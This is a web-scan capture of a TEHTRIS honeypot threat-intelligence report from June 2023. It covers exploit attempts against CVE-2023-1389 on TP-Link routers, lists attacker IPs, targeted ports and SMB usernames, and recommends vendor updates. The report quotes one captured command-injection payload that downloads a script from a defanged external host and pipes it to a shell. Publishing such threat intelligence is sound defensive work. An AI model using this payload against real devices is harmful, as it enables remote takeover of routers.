tehtris.com
Open in
urlscan Pro
162.159.135.42
Public Scan
URL:
https://tehtris.com/en/blog/our-selection-of-alerts-on-honeypots-report-12-june-2023/
Submission: On November 11 via api from IN — Scanned from CA
Submission: On November 11 via api from IN — Scanned from CA
Form analysis 2 forms found in the DOM
POST /en/blog/our-selection-of-alerts-on-honeypots-report-12-june-2023/#wpcf7-f107841-p109542-o1
<form action="/en/blog/our-selection-of-alerts-on-honeypots-report-12-june-2023/#wpcf7-f107841-p109542-o1" method="post" class="wpcf7-form init cf7sg-ready" aria-label="Contact form" novalidate="novalidate" data-status="init"
id="wpcf7-cf7sg-form-newsletter-tech-en">
<div style="display: none;">
<input type="hidden" name="_wpcf7" value="107841">
<input type="hidden" name="_wpcf7_version" value="6.0">
<input type="hidden" name="_wpcf7_locale" value="en_US">
<input type="hidden" name="_wpcf7_unit_tag" value="wpcf7-f107841-p109542-o1">
<input type="hidden" name="_wpcf7_container_post" value="109542">
<input type="hidden" name="_wpcf7_posted_data_hash" value="">
<input type="hidden" name="_wpcf7cf_hidden_group_fields" value="[]">
<input type="hidden" name="_wpcf7cf_hidden_groups" value="[]">
<input type="hidden" name="_wpcf7cf_visible_groups" value="[]">
<input type="hidden" name="_wpcf7cf_repeaters" value="[]">
<input type="hidden" name="_wpcf7cf_steps" value="{}">
<input type="hidden" name="_wpcf7cf_options"
value="{"form_id":107841,"conditions":[],"settings":{"animation":"yes","animation_intime":200,"animation_outtime":200,"conditions_ui":"normal","notice_dismissed":false,"notice_dismissed_rollback-cf7-5.8.3":true,"notice_dismissed_rollback-cf7-5.9.2":true}}">
<input type="hidden" name="_wpcf7_key" value="newsletter-tech-en">
<input type="hidden" name="_cf7sg_toggles" value="">
<input type="hidden" name="_cf7sg_version" value="4.15.8">
<input type="hidden" name="_wpnonce" value="67a5d44fa0">
<input type="hidden" name="_wpcf7_lang" value="en">
<input type="hidden" name="_wpcf7_recaptcha_response"
value="03AFcWeA66ie96JRzwLHfnAtwegLZDWCZjswWxnL_X5Hq2XlnhBJipW_GwUiczBRyHRY0PEW91kWd5wJSpv77rFIDzZMpzZdoVTnCNYwLcYLoZqfcL4pHSoMJqh3Gylv5fc1pCpKgPfgDo7Q2o0wDhvPizq_po4EuOVolEWDhzFTpRbYkY8Gxfda51_7zwWXkBSI9VE795a5Ebo2duITKuk41D0HqIqnOpjqyxAz-RUhBpy_Is52UGHCufIoMB76sU52wM94raZWMvLUqTpLnyOw4MuQ81aIDyNZ0uJqtZz0clASSjBTIqUl81cpzdBAL6APT0-hqzeUiUAA_S48LXw6EYPVebBxq9wQnaQUBXmMk9IXFsL6FOSrBfKUow2YWpR7PfOGODe1S1VeQqY81xukoTospN6euAlQuEp7xaPPUgLYVFuS6QVDmXgDm5Hk-LVSF2SVTSsitJrfSh6SdOM6rn8VPUCA7Um63vcPDCh_ZEBu1X4FE2rlRZtWRLpZLEUmV0iib8sEVcLDIokaDaX5ZKxUF6x7SPYHDHNip1DAW8tJVrLbp2D5XsvI-yAqH1GDK-0_b2xixrqp-iP-Z70l67Jq89EISQPXhx9xVywPFrFvWK62iIcvCwIjysa17ZXzWfpwVqi57e4IwNPBtyLme08CxOEPy6RtU6XnqAxngOTPyXMviSbCKm3hW-MpmZXxckMlfuHJHGZnckvPTxuTZa1-pQTI_9RkLsrmKXAl1zKGBiOKz_apVK4fywF9Ku5zY-TluGlcZ0PzSBJUn6in86fBCzPy7JMsChbmAcyvdSqfoZExl0te0g64ylpRya9ew-xxkzuMKCXV3shIOS76ehSLcCyEQUlW_M2PS05vf953wJmiyh_qg">
<input type="hidden" name="the_post_id" value="109542">
</div>
<div class="container">
<div class="row">
<div class="columns one-half">
<div class="field text required">
<label for="text-first_name">First name*</label><span class="wpcf7-form-control-wrap" data-name="first_name"><input size="40" maxlength="400" class="wpcf7-form-control wpcf7-text wpcf7-validates-as-required" id="text-first_name"
aria-required="true" aria-invalid="false" placeholder="First name" value="" type="text" name="first_name"></span>
<p class="info-tip"></p>
</div>
</div>
<div class="columns one-half">
<div class="field text required">
<label for="text-last_name">Last name*</label><span class="wpcf7-form-control-wrap" data-name="last_name"><input size="40" maxlength="400" class="wpcf7-form-control wpcf7-text wpcf7-validates-as-required" id="text-last_name"
aria-required="true" aria-invalid="false" placeholder="Last name" value="" type="text" name="last_name"></span>
<p class="info-tip"></p>
</div>
</div>
</div>
<div class="row">
<div class="columns full">
<div class="field email required"><label for="">Email*<em>*</em></label><span class="wpcf7-form-control-wrap" data-name="email"><input size="40" maxlength="400"
class="wpcf7-form-control wpcf7-email wpcf7-validates-as-required wpcf7-text wpcf7-validates-as-email" id="text-email" aria-required="true" aria-invalid="false" placeholder="Email" value="" type="email" name="email"></span>
<p class="info-tip"></p>
</div>
</div>
</div>
<div class="container">
<div class="row">
<div class="columns full">
<div class="field acceptance required">
<span class="wpcf7-form-control-wrap" data-name="grpd-consent"><span class="wpcf7-form-control wpcf7-acceptance"><span class="wpcf7-list-item"><label><input type="checkbox" name="grpd-consent" value="1" aria-invalid="false"><span
class="wpcf7-list-item-label">I agree to the <a target="_blank" href="https://tehtris.com/en/privacy-and-cookies-policy/">Privacy Policy</a>.</span></label></span></span></span>
<p class="info-tip"></p>
</div>
</div>
</div>
<div class="row">
<div class="columns full">
<div class="field cf7sg-popup-box">
<input class="wpcf7-form-control wpcf7-submit has-spinner btn" type="submit" value="Subscribe" disabled=""><span class="cf7sg-popup display-none">Disabled! To enable, check the acceptance field.</span><span class="wpcf7-spinner"></span>
<p class="info-tip"></p>
</div>
</div>
</div>
</div>
</div>
<div class="cf7sg-response-output" aria-hidden="true">
<div class="wpcf7-response-output"></div>
</div>
</form>POST /en/blog/our-selection-of-alerts-on-honeypots-report-12-june-2023/#wpcf7-f107841-p109542-o2
<form action="/en/blog/our-selection-of-alerts-on-honeypots-report-12-june-2023/#wpcf7-f107841-p109542-o2" method="post" class="wpcf7-form init cf7sg-ready" aria-label="Contact form" novalidate="novalidate" data-status="init"
id="wpcf7-cf7sg-form-newsletter-tech-en">
<div style="display: none;">
<input type="hidden" name="_wpcf7" value="107841">
<input type="hidden" name="_wpcf7_version" value="6.0">
<input type="hidden" name="_wpcf7_locale" value="en_US">
<input type="hidden" name="_wpcf7_unit_tag" value="wpcf7-f107841-p109542-o2">
<input type="hidden" name="_wpcf7_container_post" value="109542">
<input type="hidden" name="_wpcf7_posted_data_hash" value="">
<input type="hidden" name="_wpcf7cf_hidden_group_fields" value="[]">
<input type="hidden" name="_wpcf7cf_hidden_groups" value="[]">
<input type="hidden" name="_wpcf7cf_visible_groups" value="[]">
<input type="hidden" name="_wpcf7cf_repeaters" value="[]">
<input type="hidden" name="_wpcf7cf_steps" value="{}">
<input type="hidden" name="_wpcf7cf_options"
value="{"form_id":107841,"conditions":[],"settings":{"animation":"yes","animation_intime":200,"animation_outtime":200,"conditions_ui":"normal","notice_dismissed":false,"notice_dismissed_rollback-cf7-5.8.3":true,"notice_dismissed_rollback-cf7-5.9.2":true}}">
<input type="hidden" name="_wpcf7_key" value="newsletter-tech-en">
<input type="hidden" name="_cf7sg_toggles" value="">
<input type="hidden" name="_cf7sg_version" value="4.15.8">
<input type="hidden" name="_wpnonce" value="67a5d44fa0">
<input type="hidden" name="_wpcf7_lang" value="en">
<input type="hidden" name="_wpcf7_recaptcha_response"
value="03AFcWeA66ie96JRzwLHfnAtwegLZDWCZjswWxnL_X5Hq2XlnhBJipW_GwUiczBRyHRY0PEW91kWd5wJSpv77rFIDzZMpzZdoVTnCNYwLcYLoZqfcL4pHSoMJqh3Gylv5fc1pCpKgPfgDo7Q2o0wDhvPizq_po4EuOVolEWDhzFTpRbYkY8Gxfda51_7zwWXkBSI9VE795a5Ebo2duITKuk41D0HqIqnOpjqyxAz-RUhBpy_Is52UGHCufIoMB76sU52wM94raZWMvLUqTpLnyOw4MuQ81aIDyNZ0uJqtZz0clASSjBTIqUl81cpzdBAL6APT0-hqzeUiUAA_S48LXw6EYPVebBxq9wQnaQUBXmMk9IXFsL6FOSrBfKUow2YWpR7PfOGODe1S1VeQqY81xukoTospN6euAlQuEp7xaPPUgLYVFuS6QVDmXgDm5Hk-LVSF2SVTSsitJrfSh6SdOM6rn8VPUCA7Um63vcPDCh_ZEBu1X4FE2rlRZtWRLpZLEUmV0iib8sEVcLDIokaDaX5ZKxUF6x7SPYHDHNip1DAW8tJVrLbp2D5XsvI-yAqH1GDK-0_b2xixrqp-iP-Z70l67Jq89EISQPXhx9xVywPFrFvWK62iIcvCwIjysa17ZXzWfpwVqi57e4IwNPBtyLme08CxOEPy6RtU6XnqAxngOTPyXMviSbCKm3hW-MpmZXxckMlfuHJHGZnckvPTxuTZa1-pQTI_9RkLsrmKXAl1zKGBiOKz_apVK4fywF9Ku5zY-TluGlcZ0PzSBJUn6in86fBCzPy7JMsChbmAcyvdSqfoZExl0te0g64ylpRya9ew-xxkzuMKCXV3shIOS76ehSLcCyEQUlW_M2PS05vf953wJmiyh_qg">
<input type="hidden" name="the_post_id" value="109542">
</div>
<div class="container">
<div class="row">
<div class="columns one-half">
<div class="field text required">
<label for="text-first_name">First name*</label><span class="wpcf7-form-control-wrap" data-name="first_name"><input size="40" maxlength="400" class="wpcf7-form-control wpcf7-text wpcf7-validates-as-required" aria-required="true"
aria-invalid="false" placeholder="First name" value="" type="text" name="first_name"></span>
<p class="info-tip"></p>
</div>
</div>
<div class="columns one-half">
<div class="field text required">
<label for="text-last_name">Last name*</label><span class="wpcf7-form-control-wrap" data-name="last_name"><input size="40" maxlength="400" class="wpcf7-form-control wpcf7-text wpcf7-validates-as-required" aria-required="true"
aria-invalid="false" placeholder="Last name" value="" type="text" name="last_name"></span>
<p class="info-tip"></p>
</div>
</div>
</div>
<div class="row">
<div class="columns full">
<div class="field email required"><label for="">Email*<em>*</em></label><span class="wpcf7-form-control-wrap" data-name="email"><input size="40" maxlength="400"
class="wpcf7-form-control wpcf7-email wpcf7-validates-as-required wpcf7-text wpcf7-validates-as-email" aria-required="true" aria-invalid="false" placeholder="Email" value="" type="email" name="email"></span>
<p class="info-tip"></p>
</div>
</div>
</div>
<div class="container">
<div class="row">
<div class="columns full">
<div class="field acceptance required">
<span class="wpcf7-form-control-wrap" data-name="grpd-consent"><span class="wpcf7-form-control wpcf7-acceptance"><span class="wpcf7-list-item"><label><input type="checkbox" name="grpd-consent" value="1" aria-invalid="false"><span
class="wpcf7-list-item-label">I agree to the <a target="_blank" href="https://tehtris.com/en/privacy-and-cookies-policy/">Privacy Policy</a>.</span></label></span></span></span>
<p class="info-tip"></p>
</div>
</div>
</div>
<div class="row">
<div class="columns full">
<div class="field cf7sg-popup-box">
<input class="wpcf7-form-control wpcf7-submit has-spinner btn" type="submit" value="Subscribe" disabled=""><span class="cf7sg-popup display-none">Disabled! To enable, check the acceptance field.</span><span class="wpcf7-spinner"></span>
<p class="info-tip"></p>
</div>
</div>
</div>
</div>
</div>
<div class="cf7sg-response-output" aria-hidden="true">
<div class="wpcf7-response-output"></div>
</div>
</form>Text Content
Skip to content
* Contact
* Blog
* Glossary
English Français Deutsch Español
/
Toggle menu
* Articles
* Glossary
Go to TEHTRIS website
June 19, 2023
CERTHoneypots
OUR SELECTION OF ALERTS ON HONEYPOTS: REPORT 12 – JUNE 2023
Share on Facebook Share on Twitter Share on LinkedIn
A good understanding of active threats is necessary to achieve a good security
posture. The following report provides actual trends that emerge from the
Internet Background Noise. The following data is based on the monitoring of two
weeks of our Honeypots logs.
Check out our previous report here.
* CVE-2023-1389 exploit attempts
* Top ports/protocols targeted by threat actors
* Most used usernames over SMB protocol
* Log4j – CVE-2021-44228
* CVE-2021-41277 exploit attempts
CVE-2023-1389 EXPLOIT ATTEMPTS
Publicly disclosed mid-March 2023, the CVE-2023-1389 (CVSSv3 : 8.8) refers to
TP-Link Archer AX21 which contains a command injection vulnerability that allows
remote code execution.
We monitored a spike on our honeypots on the 1st of June.
We recorded 93 IPs used to exploit this vulnerability through port 80/TCP. Here
is the top 10:
IPASCountry182.155.241[.]214AS 17809 ( VEE TIME CORP. )TW211.196.92[.]241AS 4766
( Korea Telecom )KR221.163.180[.]245AS 4766 ( Korea Telecom )KR24.89.68[.]141AS
21804 ( ACCESS-SK )CA61.79.206[.]56AS 4766 ( Korea Telecom
)KR121.168.207[.]166AS 4766 ( Korea Telecom )KR72.10.198[.]197AS 36100 (
MTC-BROADBAND )US14.39.85[.]181AS 4766 ( Korea Telecom )KR203.217.115[.]226AS
17809 ( VEE TIME CORP. )TW217.181.189[.]74AS 8399 ( SEWAN SAS )FR
The IP addresses in bold are not known from public databases identifying
malicious IP.
Regarding the victims, our European honeypots were mainly targeted (90%),
followed by honeypots in Northern and Southern Asia Pacific.
In the TEHTRIS NTA packets, we came across this command-line aimed at exploting
this CVE:
* operation=write&country=$(id>`wget hxxp://cdn2[.]duc3k.com/t -O-|sh
TEHTRIS recommands applying updates per vendor instructions.
TOP PORTS/PROTOCOLS TARGETED BY THREAT ACTORS
PortProtocol445TCP22TCP10000TCP10001TCP10002TCP23TCP80TCP6379TCP443TCP25565TCP
MOST USED USERNAMES OVER SMB PROTOCOL
Almost 18 million SMB connection attemps were registered since the beginning of
June on our worldwide honeypots network. The usernames most used by threat
actors are the following :
The most active IP addresses are not known from public databases identifiying
malicious IP :
IPASCountry24.106.191[.]170AS 11426 ( TWC-11426-CAROLINAS )US178.168.216[.]92AS
25106 ( Mobile TeleSystems JLLC )BY181.65.138[.]129AS 6147 ( Telefonica del Peru
S.A.A. )PE1.174.10[.]209AS 3462 ( Data Communication Business Group
)TW178.168.214[.]33AS 25106 ( Mobile TeleSystems JLLC )BY1.174.25[.]188AS 3462 (
Data Communication Business Group )TW62.162.126[.]218AS 6821 ( Makedonski
Telekom AD-Skopje )MK
LOG4J – CVE-2021-44228
Want to learn more on this subject?
More insights on this research issued from the alerts on our worldwide honeypots
network.
Subscribe to our bi-monthly threat intelligence newsletter
First name*
Last name*
Email**
I agree to the Privacy Policy.
Disabled! To enable, check the acceptance field.
CVE-2021-41277 EXPLOIT ATTEMPTS
Want to learn more on this subject?
More insights on this research issued from the alerts on our worldwide honeypots
network.
Subscribe to our bi-monthly threat intelligence newsletter
First name*
Last name*
Email**
I agree to the Privacy Policy.
Disabled! To enable, check the acceptance field.
--------------------------------------------------------------------------------
Information remain TEHTRIS sole property and reproduction is forbidden
TEHTRIS is and remains sole property rights owner of the information provided
herein. Any copy, modification, derivative work, associated document, as well as
every intellectual property right, is and must remain TEHTRIS’ sole and
exclusive property. TEHTRIS authorizes the user to access for read use only.
Except as expressly provided above, nothing contained herein will be construed
as conferring any license or right under any TEHTRIS’ copyright.
No warranty and liability
TEHTRIS will not be held liable for any use, improper or incorrect use of the
information described and/or contained herein and assume no responsibility for
anyone’s use of the information. Although every effort has been made to provide
complete and accurate information, TEHTRIS makes no warranty, expressed or
implied regarding accuracy, adequacy, completeness, legality, reliability, or
usefulness of any information provided herein. This disclaimer applies to both
isolated and aggregated uses of the information.
OUR LATEST ARTICLES
July 25, 2024
DAOLPU INFOSTEALER: FULL ANALYSIS OF THE LATEST MALWARE EXPLOITED POST
CROWDSTRIKE OUTAGE
June 20, 2024
HONEYPOTS: FOCUS ON HONEYPOTS HOSTED IN GERMANY
May 31, 2024
UNRELEASED RAAS ANALYSIS- CASHRANSOMWARE
SUBSCRIBE TO THE TEHTRIS NEWSLETTER.
Once a month, receive the essential news and cyber watch by subscribing to the
TEHTRIS newsletter.
Subscribe to the newsletter
POST NAVIGATION
Previous article Our selection of alerts on honeypots: report 11 – june 2023
Next article The impact of European sovereignty on your company
To explore the subject
SIMILAR PUBLICATIONS
CERTHoneypots
HONEYPOTS: FOCUS ON HONEYPOTS HOSTED IN GERMANY
For the first half of May 2024, TEHTRIS honeypots hosted in Germany have been
hit almost... Read more
June 20, 2024
CERTHoneypots
HONEYPOTS: FOCUS ON CVE-2024-3273
The CVE-2024-3273 (CVSSv3: N/A) was disclosed on the 3rd of April. It refers to
a command... Read more
May 30, 2024
CERTHoneypots
OUR SELECTION OF ALERTS ON HONEYPOTS: REPORT 23 – DECEMBER 2023
The following report consists of TEHTRIS observations on our worldwide honeypots
network to provide you with... Read more
December 18, 2023
TEHTRIS XDR AI PLATFORM
EDR OPTIMUS MTD SIEM NTA Honeypots SOAR CTI CYBERIA ZTR
* XDR AI Platform
* TEHTRIS XDR AI PLATFORM
* TEHTRIS XDR AI PLATFORM
* SOAR
* Threat Intelligence
* CYBERIA
* Solutions
* EDR OPTIMUS
* MTD
* SIEM
* NTA
* Honeypots
* ECOSYSTEM
* Discover our ECOSYSTEM
* ZTR
* Use cases
* Industry
* Critical infrastructures
* Public administrations
* Healthcare
* Banking & Insurance
* Transportation
* Service providers
* Retail
* Education
* Choosing TEHTRIS
* Why choose TEHTRIS?
* Why choose TEHTRIS?
* Awards & certifications
* TEHTRIS CERT
* References
* References & testimonials
* MITRE ATTACK
* Gartner
* Services
* Services
* CyberSphere
* CyberSphere Configurations
* Cyber Intelligence
* Cyber & Intelligence Expertise
* Run et deployment support
* Cybersecurity Academy
* Partners
* Service partners
* MSSP
* Distributing partners
* TEHTRIS XCelerity
* Technology partners
* ECOSYSTEM
* Technology partners
* Affiliations
* Becoming a partner
* Company
* About us
* Discover TEHTRIS
* Board Members
* Comex
* TEHTRIS’ teams
* Careers
* Our values
* Join us
* News
* TEHTRIS news
* CSR
* Resources
* Blog
* Products news
* Glossary
* White papers
* Press releases
Cyber or not cyber ?
Once a month, receive the essential news and cyber watch by subscribing to the
TEHTRIS newsletter.
Subscribe to the newsletter
* Legal notice
* Privacy and cookies policy
* Legal documents
* Contact
* Contact DPO
* False positive/False negative
LinkedIn X YouTube
Please take a moment to manageOur Cookies
We've waited to be sure you were actually interested in our content.
Consents certified by
No, thanksI want to chooseOK!
Axeptio consent
Consent Management Platform: Personalize Your Options
Our platform empowers you to tailor and manage your privacy settings, ensuring
compliance with regulations. Customize your preferences to control how your
information is handled.